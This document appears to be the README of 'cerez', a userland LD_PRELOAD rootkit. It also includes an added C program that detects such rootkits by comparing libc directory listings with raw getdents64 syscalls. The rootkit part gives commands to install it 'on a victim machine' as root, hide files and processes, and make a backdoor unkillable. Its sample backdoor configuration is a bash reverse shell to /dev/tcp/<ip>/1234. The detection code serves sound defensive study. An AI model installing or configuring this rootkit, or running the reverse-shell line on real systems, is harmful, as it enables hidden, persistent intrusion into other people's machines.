Cerez is a configurable userland LD_PRELOAD rootkit. By installing it
into /etc/ld.so.preload, you can preload it before every dynamically linked binary.
It can protect and hide your backdoor as well as any other files you want
hidden. It does so by overriding libc functions (the wrappers around syscalls)
such as open, unlinkat, readdir etc., so the hooks only affect programs that
go through libc; statically linked binaries and code that issues raw syscalls
are not affected.
- ✔ Hides files in the file system
- ✔ Hides your backdoor in the process list
- ❌ Does not hide connections in the network list
- ✔ Makes your backdoor unkillable
- ✔ Makes files unreadable
- ✔ Makes files unwriteable
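Because the hiding happens in libc, the kernel still knows about every hidden file. The following is an added example, not cerez code and not from the project: a small checker that lists a directory once through libc (which a readdir hook can filter) and once through the raw getdents64 syscall, reports the names that only the kernel returned, and reads /etc/ld.so.preload through raw openat/read so a hooked open cannot refuse or blank it. The self-check uses a constructed temp directory under /tmp (assumed writable) and sample content "/lib/evil.so" that is made up for the demo.

```c
/* Added example, not part of cerez: compare a libc directory listing against
 * the raw getdents64 syscall and read files via raw syscalls. Build it
 * statically so the checker itself cannot be preloaded into:
 *   gcc -static -O2 -o preload_check preload_check.c */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define MAX_ENTRIES 512
#define NAME_LEN 256
typedef char name_t[NAME_LEN];

/* Kernel record layout returned by getdents64; glibc does not export it. */
struct raw_dirent64 {
    uint64_t d_ino;
    int64_t d_off;
    unsigned short d_reclen;
    unsigned char d_type;
    char d_name[];
};

/* Listing via raw syscalls only: openat, getdents64, close. Not hookable from userland. */
static int raw_listdir(const char *path, name_t *names, int max)
{
    int fd = (int)syscall(SYS_openat, AT_FDCWD, path, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0) return -1;
    char buf[8192];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;                 /* 0 = end of directory, <0 = error */
        for (long pos = 0; pos < nread;) {
            struct raw_dirent64 *d = (struct raw_dirent64 *)(buf + pos);
            if (n < max) snprintf(names[n++], NAME_LEN, "%s", d->d_name);
            pos += d->d_reclen;
        }
    }
    syscall(SYS_close, fd);
    return n;
}

/* Same listing via libc; an LD_PRELOAD hook on readdir() can filter this one. */
static int libc_listdir(const char *path, name_t *names, int max)
{
    DIR *dir = opendir(path);
    if (!dir) return -1;
    int n = 0;
    struct dirent *de;
    while ((de = readdir(dir)) != NULL && n < max)
        snprintf(names[n++], NAME_LEN, "%s", de->d_name);
    closedir(dir);
    return n;
}

/* Names the kernel returns but libc does not. Fills `hidden`, returns the count or -1. */
int find_hidden_entries(const char *path, name_t *hidden, int max)
{
    static name_t raw[MAX_ENTRIES], seen[MAX_ENTRIES];
    int nraw = raw_listdir(path, raw, MAX_ENTRIES);
    int nseen = libc_listdir(path, seen, MAX_ENTRIES);
    if (nraw < 0 || nseen < 0) return -1;
    int nhidden = 0;
    for (int i = 0; i < nraw; i++) {
        int found = 0;
        for (int j = 0; j < nseen && !found; j++) found = strcmp(raw[i], seen[j]) == 0;
        if (!found && nhidden < max) snprintf(hidden[nhidden++], NAME_LEN, "%s", raw[i]);
    }
    return nhidden;
}

/* Read a file through raw openat/read. Returns bytes read (NUL-terminated), -1 if unopenable. */
long raw_read_file(const char *path, char *out, size_t outsz)
{
    int fd = (int)syscall(SYS_openat, AT_FDCWD, path, O_RDONLY | O_CLOEXEC);
    if (fd < 0) return -1;
    long total = 0;
    while ((size_t)total < outsz - 1) {
        long r = syscall(SYS_read, fd, out + total, outsz - 1 - (size_t)total);
        if (r <= 0) break;
        total += r;
    }
    syscall(SYS_close, fd);
    out[total] = '\0';
    return total;
}

/* Self-check on a constructed temp dir (assumes a writable /tmp). With no rootkit loaded
   both listings agree, so it returns 0; -1 = setup failure, -2 = raw read mismatch. */
int demo_on_tempdir(void)
{
    char dir[] = "/tmp/preload_check_XXXXXX", file[300], content[64], hidden[8][NAME_LEN];
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/secret", dir);
    FILE *f = fopen(file, "w");
    if (!f) return -1;
    fputs("/lib/evil.so\n", f);                /* constructed sample content, 13 bytes */
    fclose(f);
    int n = find_hidden_entries(dir, hidden, 8);
    long got = raw_read_file(file, content, sizeof content);
    unlink(file);
    rmdir(dir);
    if (got != 13 || strcmp(content, "/lib/evil.so\n") != 0) return -2;
    return n;
}

int main(void)
{
    char preload[4096];
    name_t hidden[64];
    if (raw_read_file("/etc/ld.so.preload", preload, sizeof preload) > 0)
        printf("/etc/ld.so.preload (raw read):\n%s", preload);
    else
        printf("/etc/ld.so.preload is absent or empty (raw read)\n");
    int h = find_hidden_entries("/etc", hidden, 64);
    for (int i = 0; i < h; i++) printf("hidden from readdir(): /etc/%s\n", hidden[i]);
    printf("%d entries in /etc hidden from libc\n", h);
    return 0;
}
```

Run it on a clean host and the two listings match; with a readdir hook loaded, every configured path shows up as hidden from libc. The raw syscalls defeat userland hooks only: a kernel-level rootkit filters getdents64 itself, and a dynamically linked build of this checker could in principle have its own syscall() wrapper hooked, which is why the static build matters.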
Warning
Don't forget to edit cerez.cfg before installing.
You can install the build dependencies with apt on Debian systems:
apt update && apt install build-essential libconfig-dev
To install the rootkit on a victim machine run the following as ROOT:
git clone https://github.com/ngn13/cerez.git && cd cerez
make && make install
cd .. && rm -rf cerez
Configuration is (really) simple. In the backdoor section,
put your backdoor/malicious command; the rootkit runs it every time a program starts (if it is not already running).
Your backdoor will be hidden in the process list and will also be unkillable.
In the hidden section, specify full paths for all the files that you want hidden.
backdoor = "bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'"
hidden = (
{ path = "/etc/cerez.cfg" },
{ path = "/etc/ld.so.preload" },
{ path = "/path/to/your/super/secret/file" }
);
To learn more about LD_PRELOAD rootkits, I highly recommend you read this article.
I also left some comments in loader.c, so go ahead and read it.
You can also create an issue/PR if you are interested.